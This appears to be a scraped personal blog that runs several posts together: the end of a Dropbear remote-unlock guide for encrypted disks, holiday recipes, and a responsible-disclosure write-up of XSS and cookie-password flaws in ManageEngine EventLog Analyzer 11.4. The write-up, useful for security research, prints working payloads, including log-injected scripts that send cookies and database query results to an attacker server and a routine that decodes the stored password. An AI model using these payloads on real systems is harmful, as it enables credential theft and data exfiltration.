IP= format [host ip]::[gateway ip]:[netmask]:[hostname]:[device]:[autoconf]

Now we need to disable ens160 after we are done with drop bear so the system can bring it back online using system information.

sudo vi /usr/share/initramfs-tools/scripts/init-bottom/dropbear

Add the following at the bottom of the script:
ifconfig ens160 down

Disable dropbear on boot so OpenSSH can be used.
sudo update-rc.d -f dropbear remove

Optional step, change dropbear ssh port (recommended):
sudo vi /usr/share/initramfs-tools/scripts/init-premount/dropbear

In the run_dropbear() function, append -p <port#> to the exec line.
exec /sbin/dropbear ${DROPBEAR_OPTIONS:-$PKGOPTION_dropbear_OPTION} -Fs -p 3000

Update initramfs.
sudo update-initramfs -u

Server configuration is now compete.

Client Configuration

Now we need to get some information to the client and configure the client to connect.

Copy the host key and private key to your home dirictory.

sudo cp /etc/initramfs-tools/etc/dropbear/dropbear_rsa_host_key /home/user/known_hosts.initramfs
sudo cp /etc/initramfs-tools/root/.ssh/id_rsa /home/user/id_rsa.initramfs

Change ownership so you can scp them later:
sudo chown user:user /home/user/known_hosts.initramfs
sudo chown user:user /home/user/id_rsa.initramfs

From the client (local computer), SCP the files from the server to your client (local computer).
scp user@11.111.11.214:/home/user/known_hosts.initramfs ~/.ssh/
scp user@11.111.11.214:/home/user/id_rsa.initramfs ~/.ssh/

Fix the permissions.
chmod 600 ~/.ssh/id_rsa.initramfs

Make a easy to use ssh config.
vi ~/.ssh/config

Host alias_name
    Hostname 11.111.11.214
    User root
    Port 3000
    UserKnownHostsFile ~/.ssh/known_hosts.initramfs
    IdentityFile ~/.ssh/id_rsa.initramfs

To unlock the encrypted drives on restart, you just have to run the following.
ssh alias_name

Example output:

init6@FBI:~$ ssh alias_name
The authenticity of host '[11.111.11.214]:3000 ([11.111.11.214]:3000)' can't be established.
ECDSA key fingerprint is SHA256:l62h1eAFWnIYlSrnTPfhDb9osIKEp4E9Gxw0NdHfMBQ.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[11.111.11.214]:3000' (ECDSA) to the list of known hosts.
To unlock root-partition run unlock


BusyBox v1.22.1 (Ubuntu 1:1.22.0-15ubuntu1) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# unlock
Please unlock disk sda5_crypt:
  /run/lvm/lvmetad.socket: connect failed: No such file or directory
  WARNING: Failed to connect to lvmetad. Falling back to internal scanning.
  Reading all physical volumes.  This may take a while...
  Found volume group "vpn-vg" using metadata type lvm2
  /run/lvm/lvmetad.socket: connect failed: No such file or directory
  WARNING: Failed to connect to lvmetad. Falling back to internal scanning.
  2 logical volume(s) in volume group "vpn-vg" now active
cryptsetup: sda5_crypt set up successfully
Connection to 11.111.11.214 closed.

Let it finish booting up and you can ssh into the server the normal way.

• 1 Pie Crust
• 1/2 cup unsalted butter
• 3 tbsp flour
• 2 1/8 brown sugar
• 1/2 tsp salt
• 1/4 tsp cinnamon powder
• 6 tbsps milk
• 3 large eggs
• 2 tsps vinegar
• 2 tsps vanilla extract
• 1 1/2 cups pecans

Instructions

1. Preheat oven to 375F.
2. Melt butter and let it cool down so its not too hot.
3. In a bowl, mix flour, sugar, and salt.
4. Mix in milk, and eggs.
5. Mix in vinegar, vanilla, butter, and nuts. You might be asking why vinegar…. Trust me, it helps balance off the 5000 calories of sweet sugar you put in before.
6. Pour mix into crust and bake for 45 minutes.
7. Remove from oven and let it cool completely before slicing.
8. Enjoy with a cup of coffee!

Any good turkey starts with a good brine!

Brine

Ingredients

• 1 – 3 Star anise (optional)
• 1 tablespoon coriander seeds
• 1 tablespoon fennel seeds
• 1 tablespoon Dried Thyme
• 1 tablespoon dried rosemary
• 1 tablespoon dried sage
• 1 tablespoon peppercorns (you can crush them if you want)
• 5 whole bay leaves (optional)
• 1 to 1.5 cups of sea salt
• 2 onions
• 2 leeks
• 2 – 3 celery sticks

Instructions

1. In a pot of water roughly 4 to 5 cups. Get it nice and hot and mix the following ingredients.
   • 1 to 1.5 cups of sea salt
2. After the salt is dissolved, Turn off the heat and add the following:
   • 1 tablespoon coriander seeds
   • 1 tablespoon fennel seeds
   • 1 tablespoon Dried Thyme
   • 1 tablespoon dried rosemary
   • 1 tablespoon dried sage
   • 1 tablespoon peppercorns (you can crush them if you want)
   • 5 whole bay leaves (optional)
3. Let the water cool down.
4. After its cooled down mix it in a 5 gal bucket (clean) with a couple gallans of cold water.
5. Throw in the following:
   • 1 – 3 Star anise (optional)
   • 2 onions, cut in chunks
   • 2 leeks, cut in chunks
   • 2 – 3 celery sticks, cut in chunks
6. Place the turkey in the water. If you need to, add more water to cover turkey. The turkey should float barely.
7. Let it chill in refrigerator temps (35f) for a couple days.

Herb-Roasted Turkey

Ingredients

• 10 tablespoons (1 1/4 sticks) unsalted butter, softened
• 2 tablespoons finely chopped fresh flat-leaf parsley
• 1 tablespoon finely chopped fresh sage
• 1 tablespoon finely chopped fresh rosemary
• 1 tablespoon finely chopped fresh thyme
• Kosher salt and freshly ground black pepper
• 6 cups chicken stock
• 3 large carrots, cut into chunks
• 3 large stalks celery, cut into chunks
• 2 large onions, cut into chunks

Instructions

1. Make herb-butter: Combine the butter, parsley, sage, rosemary, and thyme in a food processor and process until smooth. Season with salt and pepper.
2. Preheat the oven to 450°F.
3. Put 4 cups of the chicken stock in a medium saucepan and keep warm over low heat. If you have no plans for your gizzards, put them in the pot with the stock. They will get cooked after 1 hr or so and you can munch on delicious gizzards.
4. Season the cavity of the turkey with salt and pepper and fill the cavity with half of the carrots, celery, and onions. Rub the entire turkey with the herb butter and season LIBERALLY with salt and pepper.
5. Scatter the remaining vegetables on the bottom of a large roasting pan. Fit a rack over the vegetables and put the turkey on top of the rack. Pour the remaining 2 cups stock into the bottom of the roasting pan and carefully put the pan in the oven. Roast until the turkey is light golden brown, about 45 minutes. Do not open the oven, leave it alone.
6. Reduce the oven temperature to 350°F and continue roasting, basting with the warm chicken stock every 15 minutes.
7. Bake until an instant-read thermometer inserted in the thigh registers 160°F, about 2 1/2 hours longer. Guesstimate about 15 minutes of cooking time per 1 lb of turkey.
8. Let your turkey rest! Poor thing had a tough time getting cooked. Rest for 30 minutes or so, covered in foil if possible, to keep it moist.
9. Strain the stock in the bottom of the roasting pan through a strainer lined with cheesecloth or paper towels into a medium saucepan. Discard the solids. Boil the stock until reduced to a sauce consistency. Arrange the turkey on a large platter and drizzle with the reduced stock. If you feel like it, you can add 1 tbsp of of cornstarch dissolved in 2 tbsp of cold water and mixed in with the hot liquid to thicken it. This makes a delish gravy.

After 3 days of hard work, your turkey is ready. Enjoy!

2 Pie crusts, 1 for top and 1 for bottom. Store bought or hand-made.
1/2 cup unsalted butter
3 tbsp flour
1/4 cup of water
1/2 cup of white sugar
1/2 cup of brown sugar
8 apples, peeled and sliced

Instructions

1. Preheat oven to 425 degrees F. Melt the butter in a saucepan. Stir in flour to form a paste. Add water, white sugar and brown sugar, and bring to a boil. Reduce temperature and let simmer.
2. Fill crust with apples, mounded slightly. Cover with a lattice work crust. Gently pour the sugar and butter liquid over the crust. Pour slowly so that it does not run off.
3. Bake 15 minutes in the preheated oven. Reduce the temperature to 350 degrees F. Continue baking for 35 to 40 minutes.

Let it cool down for about 30 minutes and enjoy with a big ball of vanilla bean ice cream on top!

1 cup milk
1/2 cup butter
1 package of yeast(fast-rising)
1/2 warm water
1 tbsp sugar
3 eggs
1/2 cup of sugar
3/4 tsp salt
4 cups of flour

Instructions

1. Make yeast mix. Mix packet of yeast with 1/2 cup of warm water and 1 tbsp sugar.
2. On stove, scald one cup of milk and add 1/2 cup of butter. Let cool until lukewarm.
3. Beat 3 eggs, well beaten until they are light and fluffy.
4. Mix milk, yeast mix, and well beaten eggs in a bowl.
5. Add 1/2 cup of sugar, 3/4 tsp salt and 4 cups of flour to wet ingredients. Mix well
6. Dough will be sticky. Cover and let rise 5-6 hrs.
7. Turn onto floured board and divide into half.
8. Roll out into big circle, around 16″ in diameter. Brush with butter
9. Cut into triangles, like a pizza is cut and roll into crescent shapes. We found that a pizza cutter works really well for this.
10. Place rolls onto baking sheet and let rise again! 5-6 hours. If you transfer them after second rise, they will deflate and look sad 🙁
11. Bake at 400 degrees for 10-12 minutes.
12. Brush baked rolls with butter and enjoy.
13. Yields around 30 rolls.

Tips

• Try to make the dough rise in a warm, humid place. Placing a warm wet towel on tops of the dough helps it grow really well.
• Sprinkle flour when rolling out the dough so it doesn’t stick to any surfaces or the roll.
• Try to make them equal sized when rolling into crescent shaped rolls.

ManageEngine Event Log Analyzer (ELA) is an IT compliance and Log Management Software for SIEM. INIT_6 discovered a persistent cross-site scripting (XSS) vulnerability, Reflected cross-site scripting (XSS) vulnerability, and passwords stored near-clear text in cookies. The vendor and CERT have been notified of these issues. The version tested was EventLog Analyzer 11.4, which was the most recent version at the time of initial disclosure. As of today, the current version offered by ManageEngine is EventLog Analyzer 11.5 which is still vulnerable to these attacks.

Multiple Reflective XSS Vulnerabilities (CVE-2017-11685)

First, I will dive into the Reflective XSS. Reflected cross-site scripting occurs when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.

After installing ManageEngine ELA this exploits was quite obvious. Pretty much any screen that has a search, a crafted URL can trigger a Reflected XSS. I stopped documenting after finding the first one. Mostly because the browsers built-in XSS protection was blocking it.

The following example shows setting fName to equal %3Cscript%3Ealert('p0wned');%3C/script%3E when viewed will execute the javascript rendering an alert box within the authenticated users web browser.

http://192.168.2.200:8400/event/appcd.do?baseUrl=appcd.do&formatId=15&table=15&fName=%3Cscript%3Ealert('p0wned');%3C/script%3E&RBBNAME=AppBasicDrillDown_LSR&appId=3&aName=TSA&severity=error&SACountSet=1

Multiple Persistent XSS Vulnerabilities (CVE-2017-11687)

I remember reading a blog, where someone had injected php code into a log file that was readable. This has been something that I have always wanted to pull off. I thought since I discovered the Reflective XSS so fast I bet other issues exist.

ManageEngine ELA has a few ways of inputting data.

• Authenticated users via web interface.
• Resources sending event logs.

Phishing for syslog XSS.

Jan  8 12:17:01 FBI CRON[408]: pam_unix(cron:session): session opened for user root by (uid=0)
Jan  8 12:17:01 FBI CRON[408]: pam_unix(cron:session): session closed for user root
Jan  8 12:17:01 FBI CRON[408]: pam_unix(cron:session): </label><script>alert('in Payload');</script><label> session opened for user root by (uid=0)
Jan  8 12:17:01 FBI <script>alert(123);</script>[408]: pam_unix(cron:session): session closed for user root
Jan  8 12:17:01 </label><script>alert(123);</script><label>FBI CRON[408]: pam_unix(cron:session): session opened for user root by (uid=0)

Screenshots of two of the three working. The bottom attack wasn't being extracted because it was considered an invalid log entry.

While investigating how the XSS was working, I noticed the actual script code doesn't show on the page (second image). Which lead me to the conclusion the code was being executed while being retrieved from the database. The code doesn't actually get injected into the page. This compounds the issue as it makes it harder to detect.

This attack vector is powerful and could cause a lot of damage. However, it isn't very useful as you need to have control of a resource reporting into the ManageEngine ELA. Next section will show to to accomplish this remotely.

Remote Persistent XSS Vulnerabilities

This vulnerability allows a malicious actor to inject persistent XSS containing JavaScript and HTML code in event logs. When this data is viewed within the web interface it will execute within the context of the authenticated user. This can allow a malicious actor to perform attacks which can be used to steal cookie data, and control the product.

Knowing how the vulnerability works. I wrote some JavaScript and html to steal cookie data with out alerting the user to these actions. If a web server is sending logs to ManageEngine ELA. It is possible to craft a malicious HTTP GET request injecting the code into the user-agent header.

192.168.2.205 - - [21/Jul/2017:11:02:13 -0600] "GET /badrequest HTTP/1.1" 404 561 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36 <script>location.href='http://192.168.2.200/cookie.php?test='+escape(document.cookie);</script>"

Video demo of the attack in progress. On the left is the ManageEngine ELA Dashboard with the administrator account searching events. On the right, Is a SSH session into the Attacker's server tailing the log file. After the administrator views the page you will see the GET request sent to the attacker showing the cookie document.

Remotely Dumping Database via XSS vulnerabilities

Using the remote persistent XSS vulnerability. It possible to craft malicious XSS to use the built-in web-based database query tool. This is accomplished by using a double POST request as shown here:

192.168.2.205 - - [04/May/2017:01:02:13 -0600] "GET /badrequest HTTP/1.1" 404 561 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36 <script>var xhr = new XMLHttpRequest();xhr.open('POST', 'http://192.168.2.205:8400/event/runQuery.do', true);xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xhr.onload = function () {console.log(this.responseText);var xhr2 = new XMLHttpRequest();xhr2.open('POST', 'http://192.168.2.200/cookie.php', true);xhr2.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xhr2.onload = function () {console.log('sent to attacker', '*')};xhr2.send(this.responseText);};xhr.send('execute=true&DatabaseType=postgres&query=select+tablename+from+pg_tables+where+schemaname%3D%27public%27+order+by+tablename');</script>"

It first creates a request to the built-in web-based database query tool. Sets the request header. Then sends the request and gets the results and is stored in 'this.responseText'. After the initial request it creates a second request 'xhr.onload'. This new request is being sent to the attackers server. Sets the request header. Then sends the data. The console.log items can be removed it was added for debugging purposes.

Below is the formated attack code:

<script>
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'http://192.168.2.205:8400/event/runQuery.do', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onload = function () {
            console.log(this.responseText);
            var xhr2 = new XMLHttpRequest();
            xhr2.open('POST', 'http://192.168.2.200/cookie.php', true);
            xhr2.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
            xhr2.onload = function () {
                    console.log('sent to attacker', '*')
                    };
            xhr2.send(this.responseText);
            };
    xhr.send('execute=true&DatabaseType=postgres&query=select+tablename+from+pg_tables+where+schemaname%3D%27public%27+order+by+tablename');
</script>

Video demo showing the database being dumped to a remote location. On the left, is the ManageEngine ELA dashboard with the administrator account searching events. On the right, Is a SSH session into the Attacker's server tailing the log file. After the administrator views the page you will see the POST request sent to the attacker showing all the available tables.

Using this attack method, it is possible to dump all logs from any resource reporting to ManageEngine ELA. This could allow you to collect session information on web servers for session hijacking, map internal assets, obtain credentials, anything you could use a SIEM for you can use here.

Decoding the Password Stored in the Cookie (CVE-2017-11686)

When a user of ManageEngine ELA checks "Keep me signed in" on the login page. It will encode the users password and store it in the cookie information as shown below. If the Active Directory integration is configured, this will disclose domain credentials.

tooltipDiv=block;
username=admin;
password=7477868287;
domainName=EventLog Authentication;
singlesignon=true;
domains=EventLog Authentication;
JSESSIONID=75E885E6C249A19DBB6CBBF42EDB5169;
JSESSIONIDSSO=63B14E10312545335A47C42E2798848D;
ELABuildNumber=11031;
graphTypes=%7B%22correlationList%22%3A%22Bar%22%2C%22myReport%22%3A%22Horizontal%22%2C%22correlationReport%22%3A%22Bar%22%2C%22sessionActivity%22%3A%22Bar%22%2C%22fimReport%22%3A%22Area%22%2C%22ruleColor%22%3A%22%239dbd2c%22%2C%22reportColor%22%3A%22%239dbd2c%22%2C%22sessionColor%22%3A%22%239dbd2c%22%2C%22fimColor%22%3A%22%239dbd2c%22%2C%22myReportColor%22%3A%22%239dbd2c%22%7D;
panelState=expanded;
sidebar=210;
Window_size=1447;
calselection=custom

Looking through the javascript code of the application, I found two blocks of code. First is used to 'encrypt' the password. Second is to 'decrypt' the password. They use the words encrypt and decrypt. However, this is actually just encoding as no keys are used to encrypt the data. In addition, regardless of the complexity of obfuscation used, they provided the decode function. It's not needed to understand how the obfuscation works to 'decrypt' the password.

function encryptPassword(textPassword) {
 var num_out = "";
 var str_in = escape(textPassword);
 for(i = 0; i < str_in.length; i++)  {
   num_out += str_in.charCodeAt(i) - 23;
}
    return num_out;
}

function decryptPassword(encPassword) {
 var str_out = "";
 var num_out = encPassword;
 for(i = 0; i < num_out.length; i += 2) {
   num_in = parseInt(num_out.substr(i,[2])) + 23;
   num_in = unescape('%' + num_in.toString(16));
   str_out += num_in;
}
    var textPassword = unescape(str_out);
    return textPassword ;
}

After modifying the decryptPassword function, setting the encPassword manually. This function allows you to execute the javascript in Chrome console to show the clear text password.

var str_out = "";
var num_out = "7477868287";
for(i = 0; i < num_out.length; i += 2) {
    num_in = parseInt(num_out.substr(i,[2])) + 23;
    num_in = unescape('%' + num_in.toString(16));
    str_out += num_in;
}
var textPassword = unescape(str_out);
console.log('clear Text Password is: ');
console.log(textPassword);

Video demo showing the results of the modified decryptPassword function using the password set in the cookie.

Conclusion

Using the combination of attacks presented here, it is possible to fully infiltrate an organization that is using ManageEngine EventLog Analyzer. Not only can you use these attacks to gain information, it is possible to delete logs to cover up tracks of other malicious actions.

With ManageEngine providing a complete list of all their customers, which many are credit unions and education I believe increases the risk of these vulnerabilities.

Time Line of Responsible Disclosure

• Sun, Jan 01, 2017: Issues discovered by INIT_6
• Mon, Jan 09, 2017: Initial contact to vendor zoho Corp. (Directed my query to ManageEngine)
• Tues, Jan 10, 2017: Initial contact to ManageEngine.
• Wed, Jan 11, 2017: ManageEngine acknowledged Vulnerability.
• Wed, Jan 18, 2017: ManageEngine responded to my query on bug bounty and disclose time frame.

EDIT

As of ManageEngine 11.6, it appears the clear text password vulnerability has been resolved. In their change log it shows "Vulnerabilities in 'Keep me signed in' option in the login page has been fixed using dynamic key based encryption." It also appears that the other vulnerabilities have been addressed as well. However, they didn't list them in the change log. Surprise Surprise.

They also didn't give me credit what I think is pretty messed up. Oh well.